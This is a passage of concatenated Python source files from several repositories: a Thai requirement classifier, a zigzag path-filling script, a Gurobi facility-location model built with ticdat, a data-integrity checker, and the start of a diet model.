for i in open('requirement/data/custom_tokenizer.txt', encoding="utf-8"):
THAI_WORDS.add(i.replace('\n', '').strip())
TOKENIZER = Tokenizer(THAI_WORDS)
KEYWORDS_HIGH_PRIORITY = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/priority-high.csv')).tolist()
]
KEYWORDS_MEDIUM_PRIORITY = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/priority-medium.csv')).tolist()
]
KEYWORDS_LOW_PRIORITY = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/priority-low.csv')).tolist()
]
KEYWORDS_FUNCTIONAL = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/functional.csv')).tolist()
]
KEYWORDS_NON_FUNCTIONAL = [
Keyword(i[0], int(i[1])) for i in array(read_csv('requirement/data/keywords/non-functional.csv')).tolist()
]
def get_data_group_by_priority(data, use_sample=True):
remove_list = [i.replace('\n', '').strip() for i in open('requirement/data/priority_filter.txt')]
list_high = list()
list_medium = list()
list_low = list()
for i in data:
score = [0, 0, 0]
if use_sample:
score[0] = calculate_score_sample(i, priority=0, remove_list=remove_list)
score[1] = calculate_score_sample(i, priority=1, remove_list=remove_list)
score[2] = calculate_score_sample(i, priority=2, remove_list=remove_list)
else:
score[0] = calculate_score_classic(i, KEYWORDS_HIGH_PRIORITY)
score[1] = calculate_score_classic(i, KEYWORDS_MEDIUM_PRIORITY)
score[2] = calculate_score_classic(i, KEYWORDS_LOW_PRIORITY)
try:
result = round((score[0] * 0 + score[1] * 1 + score[2] * 2)/sum(score))
except ZeroDivisionError:
result = 1
if result == 0:
list_low.append(i)
elif result == 1:
list_medium.append(i)
elif result == 2:
list_high.append(i)
return list_high, list_medium, list_low
def get_data_group_by_functionality(data, use_sample=False):
remove_list = [i.replace('\n', '').strip() for i in open('requirement/data/functionality_filter.txt')]
list_functional = list()
list_non_functional = list()
for i in data:
score = [0, 0]
if use_sample:
score[0] = calculate_score_sample(i, is_functional=False, remove_list=remove_list)
score[1] = calculate_score_sample(i, is_functional=True, remove_list=remove_list)
else:
score[0] = calculate_score_classic(i, KEYWORDS_FUNCTIONAL)
score[1] = calculate_score_classic(i, KEYWORDS_NON_FUNCTIONAL)
try:
result = round((score[0] * 2 + score[1] * 1)/sum(score))
except ZeroDivisionError:
result = 1
if result == 2:
list_functional.append(i)
elif result == 1:
list_non_functional.append(i)
return list_functional, list_non_functional
def get_data_group_by_keyword(data):
dict_keywords = dict()
all_data = list()
counted_data = dict()
exceptions = [
'นะ',
'อยากได้',
'อื่น',
'ไร',
'หน่อย',
'สิ',
]
# Step 1: Append all received data
for i in data:
all_data.append(pos_tag(TOKENIZER.word_tokenize(i.description)))
# Step 2: Count and clean other word types than NCMN (Probably nouns)
for i in all_data:
for j in i:
if j[1] == 'NCMN' and j[0] not in exceptions:
if j not in counted_data:
counted_data[j] = 1
else:
counted_data[j] += 1
# Step 3: Remove exceeded keywords
minimum = 2
while len(counted_data) > 9:
for i in sorted(counted_data, key=lambda x: counted_data[x]):
if counted_data[i] < minimum:
counted_data.pop(i)
minimum += 1
# Step 4: Put all requirements into a dict
for i in counted_data:
dict_keywords[i[0]] = [j for j in data if i[0] in TOKENIZER.word_tokenize(j.description)]
# Step 5: Add requirements without keywords caught
temp = list()
for i in dict_keywords:
for j in dict_keywords[i]:
if j not in temp:
temp.append(j)
dict_keywords['อื่น ๆ'] = [i for i in data if i not in temp]
return dict_keywords
def calculate_score_classic(data, source):
score = 0
for i in source:
check = True
for j in TOKENIZER.word_tokenize(i.word):
if j not in TOKENIZER.word_tokenize(data.description):
check = False
break
score += i.weight * check
return score
def calculate_score_sample(data, priority=None, is_functional=None, remove_list=('NCMN',)):
return dive_tree_compare(
create_tree(
priority=priority,
is_functional=is_functional,
remove_list=remove_list,
show_result=False
),
pos_tag_refined(
TOKENIZER.word_tokenize(data.description),
remove_list=remove_list
)
)
def pos_tag_refined(words, remove_list=('NCMN',)):
return [i for i in pos_tag(words) if i[1] not in remove_list and i[0] != ' ']
def create_tree(priority=None, is_functional=None, remove_list=('NCMN',), show_result=False, result_title=None):
if priority != None and is_functional == None:
items = [i.get_pos_tag_refined(remove_list=remove_list) for i in AnalyzedRequirement.objects.filter(priority=priority)]
elif priority == None and is_functional != None:
items = [i.get_pos_tag_refined(remove_list=remove_list) for i in AnalyzedRequirement.objects.filter(is_functional=is_functional)]
else:
return
root = TreeNode(result_title)
for i in items:
if len(i) != 0:
dive_tree_append(node=root, item=i, level=0)
if show_result:
dive_tree_print(root, 0)
return root
def dive_tree_append(node=TreeNode(None), item=(), level=0):
if item[level] not in [i.data for i in node.children]:
node.children.append(TreeNode(item[level]))
if level + 1 < len(item):
dive_tree_append(
node=node.children[[i.data for i in node.children].index(item[level])],
item=item,
level=level + 1
)
def dive_tree_print(node, level):
print('{}{}'.format(' '*(level), node.data))
for i in node.children:
dive_tree_print(i, level + 1)
def dive_tree_compare(node=TreeNode(None), item=(), level=0):
if len(item) == 0:
return 0
if item[level] in [i.data for i in node.children]:
if level + 1 < len(item):
return dive_tree_compare(
node=node.children[[i.data for i in node.children].index(item[level])],
item=item,
level=level + 1
) + 1
return 1
return 0
def create_sample_data(clear_all=False):
if clear_all:
AnalyzedRequirement.objects.all().delete()
data = [
i.replace('\n', '').split(',') for i in open('requirement/data/sample_data.csv', encoding='utf-8')
][1:]
data = [
(AnalyzedRequirement.objects.create(
text=i[0],
priority=int(i[1]),
is_functional=bool(int(i[2]))
), print(i)) for i in data
]
print(data)
```
#### File: requirement-classification/requirement/models.py
```python
from django.db import models
from pythainlp.corpus.common import thai_words
from pythainlp.tag import pos_tag
from pythainlp import Tokenizer
THAI_WORDS = set(thai_words())
for i in open('requirement/data/custom_tokenizer.txt', encoding="utf-8"):
THAI_WORDS.add(i.replace('\n', '').strip())
TOKENIZER = Tokenizer(THAI_WORDS)
class AnalyzedRequirement(models.Model):
PRIORITY_CHOICES = (
(0, 'low'),
(1, 'medium'),
(2, 'high'),
)
IS_FUNCTIONAL_CHOICES = (
(False, 'non-functional'),
(True, 'functional'),
)
text = models.TextField(null=False, blank=False)
priority = models.IntegerField(choices=PRIORITY_CHOICES, null=True, blank=True)
is_functional = models.BooleanField(choices=IS_FUNCTIONAL_CHOICES, null=True, blank=True)
def __str__(self):
return '{} ({} | {})'.format(self.text, self.priority, self.is_functional)
def get_words(self):
return TOKENIZER.word_tokenize(self.text)
def get_pos_tag(self):
return pos_tag(self.get_words())
def get_pos_tag_refined(self, remove_list=('NCMN', 'RPRE', 'VACT', 'VATT', 'VSTA')):
return [i for i in self.get_pos_tag() if i[1] not in remove_list and i[0] != ' ']
``` |
{
"source": "812610357/APMCM",
"score": 3
} |
#### File: APMCM/code/a21.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import math
import time
plt.axis("equal")
d = -0.1
inputpath = "./code/graph2.csv"
outputpath = "./code"
length = 0 # 画线总长
times = 0
dots = 0
num = 0
'''
第一部分
'''
def _min(parentre, cor, data):
return np.min(data[parentre][:, cor])
def _max(parentre, cor, data):
return np.max(data[parentre][:, cor])
def range_judge(i, j, data):
if _max(i, 0, data) > _max(j, 0, data) and _min(i, 0, data) < _min(j, 0, data) and _max(i, 1, data) > _max(j, 1, data) and _min(i, 1, data) < _min(j, 1, data): # i和j比较,如果是包含关系,就返回小的那一个,如果是不是包含关系,就返回0
return j
elif _max(i, 0, data) < _max(j, 0, data) and _min(i, 0, data) > _min(j, 0, data) and _max(i, 1, data) < _max(j, 1, data) and _min(i, 1, data) > _min(j, 1, data):
return i
else:
return -2
def findparent(data):
# parent[本名][0(父级),1(层数)]
parent = list([])
for i in range(len(data)):
parent.append([-1, 1])
for i in range(0, len(data)): # i,j都是父级名字 ,然后开始找父级
for j in range(i+1, len(data)):
if range_judge(i, j, data) != -2:
small_name = range_judge(i, j, data)
big_name = (i if j == small_name else j)
parent[small_name][1] += 1
if range_judge(big_name, parent[small_name][0], data) == big_name or parent[small_name][0] == -1:
parent[small_name][0] = big_name # 自己的层数+1
else:
continue
return(parent)
'''
第二部分
'''
def unit(v): # 单位化
return(v/np.linalg.norm(v))
def inangle(v1, v2): # 向量夹角
return(math.acos(np.dot(v1, np.transpose(v2)) / (np.linalg.norm(v1)*np.linalg.norm(v2))))
def cross(v1, v2): # 叉乘
return(v1[0]*v2[1]-v2[0]*v1[1])
def ifcross(p1, p2, q1, q2): # 判断有无交叉
v11 = q1-p1
v12 = q2-p1
v21 = q1-p2
v22 = q2-p2
if cross(v11, v12)*cross(v21, v22) < 0 and cross(v11, v21)*cross(v12, v22) < 0:
return(1)
else:
return(0)
def drawborder(data): # 内缩一次
data = np.insert(data, data.shape[0], values=data[1, :], axis=0)
data = np.insert(data, 0, values=data[data.shape[0]-3, :], axis=0)
temp = np.array([0, 0])
i = 0
while i < data.shape[0]-2:
v1 = data[i+1, :]-data[i, :]
v2 = data[i+2, :]-data[i+1, :]
u = d/(math.sin(inangle(v1, v2)))
if cross(v1, v2) > 0:
new = data[i+1, :]+(unit(v2)-unit(v1))*u
else:
new = data[i+1, :]-(unit(v2)-unit(v1))*u
temp = np.row_stack((temp, new))
i += 1
temp = np.delete(temp, 0, axis=0)
i = 0
while i < temp.shape[0]-3:
j = i
while j < temp.shape[0]-1:
if ifcross(temp[i, :], temp[i+1, :], temp[j, :], temp[j+1, :]):
temp = np.row_stack((temp[0:i, :], temp[j+1:, :]))
continue
else:
j += 1
i += 1
return(temp)
def getint(data): # 按精度离散化
temp = new = np.array([0, 0.])
for i in range(data.shape[0]-1):
x1 = data[i, 0]
y1 = data[i, 1]
x2 = data[i+1, 0]
y2 = data[i+1, 1]
if x1 == x2:
k = math.inf
else:
k = (y2-y1)/(x2-x1) # 差分法
if y1//abs(d) < y2//abs(d):
for j in range(1, math.floor(y2//abs(d)-y1//abs(d)+1)):
new[1] = round((y1//abs(d)+j)*abs(d), 1)
new[0] = (new[1]-y1)/k+x1
temp = np.row_stack((temp, new))
else:
if y1//abs(d) > y2//abs(d):
for j in range(0, math.floor(y1//abs(d)-y2//abs(d))):
new[1] = round((y1//abs(d)-j)*abs(d), 1)
new[0] = (new[1]-y1)/k+x1
temp = np.row_stack((temp, new))
temp = np.delete(temp, 0, axis=0)
#plt.plot(temp[:, 0], temp[:, 1], '-o', color='g', markersize=2)
return(temp)
def findmax(data): # 搜索极大值
index = np.array([], dtype="int64")
for i in range(-1, data.shape[0]-1):
if data[i, 1] > data[i-1, 1] and data[i, 1] >= data[i+1, 1]:
index = np.append(index, [i], axis=0)
return(index)
def findmin(data): # 搜索极小值
index = np.array([], dtype="int64")
for i in range(-1, data.shape[0]-1):
if data[i, 1] <= data[i-1, 1] and data[i, 1] < data[i+1, 1]:
index = np.append(index, [i], axis=0)
return(index)
def findex(data): # 获取极值序号
index = list([])
for i in range(len(data)):
index.append(np.array([findmax(data[i]), findmin(data[i])]))
return(index)
def findm(data, index): # 获取最大值序号
temp = list([])
for i in range(len(index)):
if index[i].shape[1] == 1:
temp.append(np.array([index[i][0, 0], index[i][1, 0]]))
continue
maxy = np.max(data[i][:, 1])
miny = np.min(data[i][:, 1])
m = [[], []]
for j in range(index[i].shape[1]):
if data[i][index[i][0, j], 1] == maxy:
m[0] = index[i][0, j]
for j in range(index[i].shape[1]):
if data[i][index[i][1, j], 1] == miny:
m[1] = index[i][0, j]
temp.append(np.array(m))
return(temp)
def divideout(data_out, data_in, divide_in): # 获取外层分割点
ym = np.array([data_in[divide_in[0], 1],
data_in[divide_in[1], 1]])
divide_out = np.array([], dtype='int16')
for i in [0, 1]:
for j in range(data_out.shape[0]):
if data_out[j, 1] == ym[i] and data_out[j, 0] > data_in[divide_in[0], 0]:
divide_out = np.append(divide_out, [j], axis=0)
break
return(divide_out)
def stackline(data_out, data_in, divide_out, divide_in): # 复连通区域分割连接
temp1 = np.row_stack(
(data_out[:divide_out[0]+1], data_in[divide_in[0]:divide_in[1]+1], data_out[divide_out[1]:]))
temp2 = np.row_stack(
(data_in[:divide_in[0]], data_out[divide_out[0]+1:divide_out[1]], data_in[divide_in[1]+1:]))
return(list([temp1, temp2]))
def divide1(data, index, parent): # 对复连通区域进行划分
temp = list([])
for i in range(1, (max(parent[:, 1]+1))//2+1): # 划分 i 层
for j in range(parent.shape[0]): # 搜索 i 层的外边界
if parent[j, 1] == 2*i-1:
data_out = data[j]
for k in range(parent.shape[0]): # 搜索 j 作为外边界的对应内边界
if parent[k, 0] == j:
data_in = data[k]
divide_in = index[k] # 内层分割点
divide_out = divideout(data_out, # 外层分割点
data_in, divide_in)
line = stackline(data_out, data_in, # 交叉连接分割点
divide_out, divide_in)
data_out = line[0] # 更新外层
temp.append(line[1]) # 写入内层
temp.append(data_out) # 写入外层
return(temp)
def divideline(data, index): # 获取单连通区域分割点
line = np.array([0, 0])
for n in [0, 1]:
for i in index[n]:
judge = 0
j = i-2
while j > -0.02*data.shape[0]:
if data[j, 1] == data[i, 1]:
judge += 1
break
j -= 1
if judge == 0:
continue
k = i+2
while k < 0.98*data.shape[0]:
if data[k, 1] == data[i, 1]:
judge += 1
break
k += 1
if judge == 1:
continue
elif n == 0:
line = np.row_stack((line, [j, i]))
else:
line = np.row_stack((line, [i, k]))
line = np.delete(line, 0, axis=0)
return(line)
def dividesub(data, line): # 复连通区域分割连接
temp = list([])
while line.shape[0]:
judge = 0
for i in range(1, line.shape[0]):
if line[0, 0] < line[i, 0] < line[0, 1]:
line = np.row_stack((line[i, :], line))
line = np.delete(line, i+1, axis=0)
judge = 1
break
if judge == 0:
temp.append(np.array(data[line[0, 0]+1:line[0, 1], :]))
for j in range(line[0, 0]+1, line[0, 1]):
data[j] = [0, 0]
line = np.delete(line, 0, axis=0)
temp.append(np.array(data[:, :]))
for i in range(len(temp)):
j = 0
while j < temp[i].shape[0]:
if temp[i][j, 0] == temp[i][j, 1] == 0:
temp[i] = np.delete(temp[i], j, axis=0)
continue
j += 1
return(temp)
def divide2(data, index): # 对单连通区域进行划分
temp = list([])
for i in range(len(data)):
if index[i].shape[1] > 1:
line = divideline(data[i], index[i])
temp += dividesub(data[i], line)
else:
temp += list([data[i]])
return(temp)
'''
第三部分
'''
def writecsv(data): # 导出线条
global times
dataframe = pd.DataFrame(data={'x': data[:, 0], 'y': data[:, 1]})
dataframe.to_csv(outputpath+f"/zigzag{times}.csv",
index=False, mode='w', sep=',')
pass
def readcsv(path): # 读取线条
data = list([])
data0 = pd.read_csv(
path, index_col=False, header=2)
j = 0
if data0.dtypes.X != "float64":
for i in range(len(data0.values)):
if "MainCurve" in data0.values[i, 0]:
data += list([np.array(data0.values[j:i, :], dtype='float64')])
j = i+2
data += list([np.array(data0.values[j:len(data0.values), :], dtype='float64')])
for i in range(len(data)):
plt.plot(data[i][:, 0], data[i][:, 1], '-o', color='b', markersize=1)
return(data)
def drawline(data): # 画平行线
global length
global times
global dots
global num
for i in range(len(data)):
line = np.array([0, 0])
area = data[i]
maxy = round(max(area[:, 1]), 1)
miny = round(min(area[:, 1]), 1)
j = miny
while j <= maxy:
index = (np.where(area == j))[0]
temp = area[index, 0]
if round(j/abs(d)+1) % 2:
line = np.row_stack((line, [j, min(temp)]))
line = np.row_stack((line, [j, max(temp)]))
else:
line = np.row_stack((line, [j, max(temp)]))
line = np.row_stack((line, [j, min(temp)]))
j = round(j + abs(d), 1)
line = np.delete(line, 0, axis=0)
line = np.column_stack((line[:, 1], line[:, 0]))
times += 1
writecsv(line)
plt.plot(line[:, 0], line[:, 1], '-', color='r')
num = num+int(line.shape[0]/2)
for j in range(line.shape[0]-1):
length = length + \
math.sqrt((line[j+1, 0]-line[j, 0])**2 +
(line[j+1, 1]-line[j, 1])**2)
dots += 1
i += 1
pass
'''
主函数
'''
start = time.thread_time()
data = readcsv(inputpath)
for i in range(len(data)):
data[i] = drawborder(data[i])
data[i] = getint(data[i])
parent = np.array(findparent(data))
index = findex(data)
index = findm(data, index)
data = divide1(data, index, parent)
index = findex(data)
data = divide2(data, index)
drawline(data)
end = time.thread_time()
print('Length of curve: %s mm' % length)
print('Number of parallel line: %s' % num)
print('Number of dots: %s' % dots)
print('Running time: %s Seconds' % (end-start))
plt.show()
```
#### File: APMCM/code/a33.py
```python
import numpy as np
import matplotlib.pyplot as plt
import math
d = 1 # 修改向量(圆半径)长度
rad = 1 # 画圆密度
def unit(v): # 单位化
return(v/np.linalg.norm(v))
def cross(v1, v2): # 平面内向量叉乘
return(v1[0]*v2[1]-v2[0]*v1[1])
def dot(v1, v2): # 向量点乘
return(v1[0]*v2[0]+v1[1]*v2[1])
def angle(v): # 取辐角
return(math.atan2(v[1], v[0]))
def vertical(v, d): # 求垂直向量
vt = np.array([v[1], -v[0]])
return(unit(vt)*d)
def f_e_dot(v, head_dot): # 根据向量和起点求末点
end_dot = [v[0]+head_dot[0], v[1]+head_dot[1]]
return end_dot
def vec_sita(v, ang, head_dot): # 根据初向量、α角、▲θ、原向量起始点
v_r = [d*math.cos(ang), d*math.sin(ang)]
return f_e_dot(v_r, head_dot)
plt.axis("equal")
data = np.array([[-3, 2], [-1, 2], [0, 0], [1, 2], [3, 2]])
plt.plot(data[:, 0], data[:, 1], "-")
i = 0
while i < data.shape[0]-2:
temp = np.array([])
v1 = data[i+1, :]-data[i, :]
v2 = data[i+2, :]-data[i+1, :]
if cross(v1, v2) > 0 and dot(v1, v2) < 0:
# 已知向量和距离求其垂直向量
vl = vertical(v1, d) # 左边垂直向量
vr = vertical(v2, d) # 右边垂直向量
a = data[i+1, :] # 顶点记录
c1 = [vl[0]+a[0], vl[1]+a[1]] # 左边第一点记录
temp = np.array(c1)
for ang in np.linspace(angle(vl), angle(vr), num=10):
# 将每一个圆上的点记录在temp中
temp = np.row_stack((temp, vec_sita(vl, ang, a)))
if temp.shape[0] > 1:
plt.plot(temp[:, 0], temp[:, 1], "-")
i += 1
plt.show()
``` |
{
"source": "8135tao/ticdat",
"score": 3
} |
#### File: expert_section/cog/cogmodel.py
```python
import time
import datetime
import os
import gurobipy as gu
from ticdat import TicDatFactory, Progress, LogFile, Slicer, standard_main, gurobi_env
# ------------------------ define the input schema --------------------------------
# There are three input tables, with 4 primary key fields and 4 data fields.
input_schema = TicDatFactory (
sites = [['Name'],['Demand', 'Center Status']],
distance = [['Source', 'Destination'],['Distance']],
parameters = [["Parameter"], ["Value"]])
# add foreign key constraints
input_schema.add_foreign_key("distance", "sites", ['Source', 'Name'])
input_schema.add_foreign_key("distance", "sites", ['Destination', 'Name'])
# center_status is a flag field which can take one of two string values.
input_schema.set_data_type("sites", "Center Status", number_allowed=False,
strings_allowed=["Can Be Center", "Pure Demand Point"])
# The default type of non infinite, non negative works for distance and demand
input_schema.set_data_type("sites", "Demand")
input_schema.set_data_type("distance", "Distance")
input_schema.add_parameter("Number of Centroids", default_value=1, inclusive_min=False, inclusive_max=False, min=0,
max=float("inf"), must_be_int=True)
input_schema.add_parameter("MIP Gap", default_value=0.001, inclusive_min=False, inclusive_max=False, min=0,
max=float("inf"), must_be_int=False)
input_schema.add_parameter("Formulation", "Strong", number_allowed=False, strings_allowed=["Weak", "Strong"])
# ---------------------------------------------------------------------------------
# ------------------------ define the output schema -------------------------------
# There are three solution tables, with 2 primary key fields and 3
# data fields amongst them.
solution_schema = TicDatFactory(
openings = [['Site'],[]],
assignments = [['Site', 'Assigned To'],[]],
parameters = [["Parameter"], ["Value"]])
# ---------------------------------------------------------------------------------
# ------------------------ create a solve function --------------------------------
def solve(dat, diagnostic_log, error_and_warning_log, progress):
assert isinstance(progress, Progress)
assert isinstance(diagnostic_log, LogFile) and isinstance(error_and_warning_log, LogFile)
assert input_schema.good_tic_dat_object(dat)
assert not input_schema.find_foreign_key_failures(dat)
assert not input_schema.find_data_type_failures(dat)
diagnostic_log.write("COG output log\n%s\n\n" % time_stamp())
error_and_warning_log.write("COG error log\n%s\n\n" % time_stamp())
full_parameters = input_schema.create_full_parameters_dict(dat)
def get_distance(x,y):
if (x,y) in dat.distance:
return dat.distance[x,y]["Distance"]
if (y,x) in dat.distance:
return dat.distance[y,x]["Distance"]
return float("inf")
def can_assign(x, y):
return dat.sites[y]["Center Status"] == "Can Be Center" \
and get_distance(x,y)<float("inf")
unassignables = [n for n in dat.sites if not
any(can_assign(n,y) for y in dat.sites) and
dat.sites[n]["Demand"] > 0]
if unassignables:
# Infeasibility detected. Generate an error table and return None
error_and_warning_log.write("The following sites have demand, but can't be " +
"assigned to anything.\n")
error_and_warning_log.log_table("Un-assignable Demand Points",
[["Site"]] + [[_] for _ in unassignables])
return
useless = [n for n in dat.sites if not any(can_assign(y,n) for y in dat.sites) and
dat.sites[n]["Demand"] == 0]
if useless:
# Log in the error table as a warning, but can still try optimization.
error_and_warning_log.write("The following sites have no demand, and can't serve as the " +
"center point for any assignments.\n")
error_and_warning_log.log_table("Useless Sites", [["Site"]] + [[_] for _ in useless])
progress.numerical_progress("Feasibility Analysis" , 100)
m = gu.Model("cog", env=gurobi_env())
assign_vars = {(n, assigned_to) : m.addVar(vtype = gu.GRB.BINARY,
name = "%s_%s"%(n,assigned_to),
obj = get_distance(n,assigned_to) *
dat.sites[n]["Demand"])
for n in dat.sites for assigned_to in dat.sites
if can_assign(n, assigned_to)}
open_vars = {n : m.addVar(vtype = gu.GRB.BINARY, name = "open_%s"%n)
for n in dat.sites
if dat.sites[n]["Center Status"] == "Can Be Center"}
if not open_vars:
error_and_warning_log.write("Nothing can be a center!\n") # Infeasibility detected.
return
m.update()
progress.numerical_progress("Core Model Creation", 50)
# using ticdat.Slicer instead of tuplelist simply as a matter of taste/vanity
assign_slicer = Slicer(assign_vars)
for n, r in dat.sites.items():
if r["Demand"] > 0:
m.addConstr(gu.quicksum(assign_vars[n, assign_to]
for _, assign_to in assign_slicer.slice(n, "*"))
== 1,
name = "must_assign_%s"%n)
crippledfordemo = full_parameters["Formulation"] == "Weak"
for assigned_to, r in dat.sites.items():
if r["Center Status"] == "Can Be Center":
_assign_vars = [assign_vars[n, assigned_to]
for n,_ in assign_slicer.slice("*", assigned_to)]
if crippledfordemo:
m.addConstr(gu.quicksum(_assign_vars) <=
len(_assign_vars) * open_vars[assigned_to],
name="weak_force_open%s"%assigned_to)
else:
for var in _assign_vars :
m.addConstr(var <= open_vars[assigned_to],
name = "strong_force_open_%s"%assigned_to)
number_of_centroids = full_parameters["Number of Centroids"]
m.addConstr(gu.quicksum(v for v in open_vars.values()) == number_of_centroids,
name= "numCentroids")
m.Params.MIPGap = full_parameters["MIP Gap"]
m.update()
progress.numerical_progress("Core Model Creation", 100)
m.optimize(progress.gurobi_call_back_factory("COG Optimization", m))
progress.numerical_progress("Core Optimization", 100)
if not hasattr(m, "status"):
print("missing status - likely premature termination")
return
for failStr,grbkey in (("inf_or_unbd", gu.GRB.INF_OR_UNBD),
("infeasible", gu.GRB.INFEASIBLE),
("unbounded", gu.GRB.UNBOUNDED)):
if m.status == grbkey:
print("Optimization failed due to model status of %s"%failStr)
return
if m.status == gu.GRB.INTERRUPTED:
error_and_warning_log.write("Solve process interrupted by user feedback\n")
if not all(hasattr(var, "x") for var in open_vars.values()):
error_and_warning_log.write("No solution was found\n")
return
elif m.status != gu.GRB.OPTIMAL:
error_and_warning_log.write("unexpected status %s\n" % m.status)
return
sln = solution_schema.TicDat()
sln.parameters["Lower Bound"] = getattr(m, "objBound", m.objVal)
sln.parameters["Upper Bound"] = m.objVal
diagnostic_log.write('Upper Bound: %g\n' % sln.parameters["Upper Bound"]["Value"])
diagnostic_log.write('Lower Bound: %g\n' % sln.parameters["Lower Bound"]["Value"])
def almostone(x) :
return abs(x-1) < 0.0001
for (n, assigned_to), var in assign_vars.items() :
if almostone(var.x) :
sln.assignments[n,assigned_to] = {}
for n,var in open_vars.items() :
if almostone(var.x) :
sln.openings[n]={}
diagnostic_log.write('Number Centroids: %s\n' % len(sln.openings))
progress.numerical_progress("Full Cog Solve", 100)
return sln
def time_stamp() :
ts = time.time()
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
# ---------------------------------------------------------------------------------
# ------------------------ provide stand-alone functionality ----------------------
def percent_error(lb, ub):
assert lb<=ub
return "%.2f"%(100.0 * (ub-lb) / ub) + "%"
# when run from the command line, will read/write json/xls/csv/db/mdb files
if __name__ == "__main__":
if os.path.exists("cog.stop"):
print("Removing the cog.stop file so that solve can proceed.")
print("Add cog.stop whenever you want to stop the optimization")
os.remove("cog.stop")
class CogStopProgress(Progress):
def mip_progress(self, theme, lower_bound, upper_bound):
super(CogStopProgress, self).mip_progress(theme, lower_bound, upper_bound)
print("%s:%s:%s"%(theme.ljust(30), "Percent Error".ljust(20),
percent_error(lower_bound, upper_bound)))
# return False (to stop optimization) if the cog.stop file exists
return not os.path.exists("cog.stop")
# creating a single argument version of solve to pass to standard_main
def _solve(dat):
# create local text files for logging
with LogFile("output.txt") as out :
with LogFile("error.txt") as err :
solution = solve(dat, out, err, CogStopProgress())
if solution :
print('\n\nUpper Bound : %g' % solution.parameters["Upper Bound"]["Value"])
print('Lower Bound : %g' % solution.parameters["Lower Bound"]["Value"])
print('Percent Error : %s' % percent_error(solution.parameters["Lower Bound"]["Value"],
solution.parameters["Upper Bound"]["Value"]))
return solution
else :
print('\nNo solution')
standard_main(input_schema, solution_schema, _solve)
# ---------------------------------------------------------------------------------
```
#### File: examples/expert_section/lebron_helper.py
```python
from ticdat import PanDatFactory, standard_main
import lebron
input_schema = lebron.input_schema.clone(clone_factory=PanDatFactory) # requires 0.2.20.4 or later.
from collections import defaultdict
_pks = {t: pks for t, (pks, dfs) in input_schema.schema().items()}
_longest_pk = max(len(pks) for pks in _pks.values())
_fld_names = [f"PK Field {_ + 1}" for _ in range(_longest_pk)]
solution_schema = PanDatFactory(duplicate_rows=[["Table Name"] + _fld_names, []],
data_type_failures=[["Table Name", "Field Name"] + _fld_names, []],
data_row_failures=[["Table Name", "Predicate Name"] + _fld_names, []],
foreign_key_failures =[["Native Table", "Foreign Table", "Mapping"] + _fld_names, []])
def solve(dat):
dups = input_schema.find_duplicates(dat)
duplicate_rows = defaultdict(list)
for table, dup_df in dups.items():
for row in dup_df.itertuples(index=False):
duplicate_rows["Table Name"].append(table)
for f, c in zip(_fld_names, row[:len(_pks[table])]):
duplicate_rows[f].append(c)
for i in range(len(_pks[table]), _longest_pk):
duplicate_rows[_fld_names[i]].append(None)
if duplicate_rows:
return solution_schema.PanDat(duplicate_rows=duplicate_rows)
dt_fails = input_schema.find_data_type_failures(dat)
data_type_failures = defaultdict(list)
for (table, field), dt_fail_df in dt_fails.items():
for row in dt_fail_df.itertuples(index=False):
data_type_failures["Table Name"].append(table)
data_type_failures["Field Name"].append(field)
for f, c in zip(_fld_names, row[:len(_pks[table])]):
data_type_failures[f].append(c)
for i in range(len(_pks[table]), _longest_pk):
data_type_failures[_fld_names[i]].append(None)
if data_type_failures:
return solution_schema.PanDat(data_type_failures=data_type_failures)
dr_fails = input_schema.find_data_row_failures(dat)
data_row_failures = defaultdict(list)
for (table, predicate), dr_fail_df in dr_fails.items():
for row in dr_fail_df.itertuples(index=False):
data_row_failures["Table Name"].append(table)
data_row_failures["Predicate Name"].append(predicate)
for f, c in zip(_fld_names, row[:len(_pks[table])]):
data_row_failures[f].append(c)
for i in range(len(_pks[table]), _longest_pk):
data_row_failures[_fld_names[i]].append(None)
if data_row_failures:
return solution_schema.PanDat(data_row_failures=data_row_failures)
fk_fails = input_schema.find_foreign_key_failures(dat, verbosity="Low")
foreign_key_failures = defaultdict(list)
for (native_table, foreign_table, mapping), fk_fail_df in fk_fails.items():
for row in fk_fail_df.itertuples(index=False):
foreign_key_failures["Native Table"].append(native_table)
foreign_key_failures["Foreign Table"].append(foreign_table)
foreign_key_failures["Mapping"].append(str(mapping))
for f, c in zip(_fld_names, row[:len(_pks[native_table])]):
foreign_key_failures[f].append(c)
for i in range(len(_pks[native_table]), _longest_pk):
foreign_key_failures[_fld_names[i]].append(None)
if foreign_key_failures:
return solution_schema.PanDat(foreign_key_failures=foreign_key_failures)
print("\nlebron_helper won't create a solution, because there are no basic data integrity problems.\n")
print("Go ahead and run lebron on this input data.\n")
if __name__ == "__main__":
standard_main(input_schema, solution_schema, solve)
```
#### File: gurobipy/diet/diet.py
```python
try: # if you don't have gurobipy installed, the code will still load and then fail on solve
import gurobipy as gp
except:
gp = None
from ticdat import TicDatFactory, standard_main
# ------------------------ define the input schema --------------------------------
# There are three input tables, with 4 primary key fields and 4 data fields.
input_schema = TicDatFactory (
categories=[["Name"], ["Min Nutrition", "Max Nutrition"]],
foods=[["Name"], ["Cost"]],
nutrition_quantities=[["Food", "Category"], ["Quantity"]])
# Define the foreign key relationships
input_schema.add_foreign_key("nutrition_quantities", "foods", ["Food", "Name"])
input_schema.add_foreign_key("nutrition_quantities", "categories",
["Category", "Name"])
# Define the data types
input_schema.set_data_type("categories", "Min Nutrition", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=False)
input_schema.set_data_type("categories", "Max Nutrition", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=True)
input_schema.set_data_type("foods", "Cost", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=False)
input_schema.set_data_type("nutrition_quantities", "Quantity", min=0, max=float("inf"),
inclusive_min=True, inclusive_max=False)
# We also want to insure that Max Nutrition doesn't fall below Min Nutrition
input_schema.add_data_row_predicate(
"categories", predicate_name="Min Max Check",
predicate=lambda row : row["Max Nutrition"] >= row["Min Nutrition"])
# The default-default of zero makes sense everywhere except for Max Nutrition
input_schema.set_default_value("categories", "Max Nutrition", float("inf"))
# ---------------------------------------------------------------------------------
# ------------------------ define the output schema -------------------------------
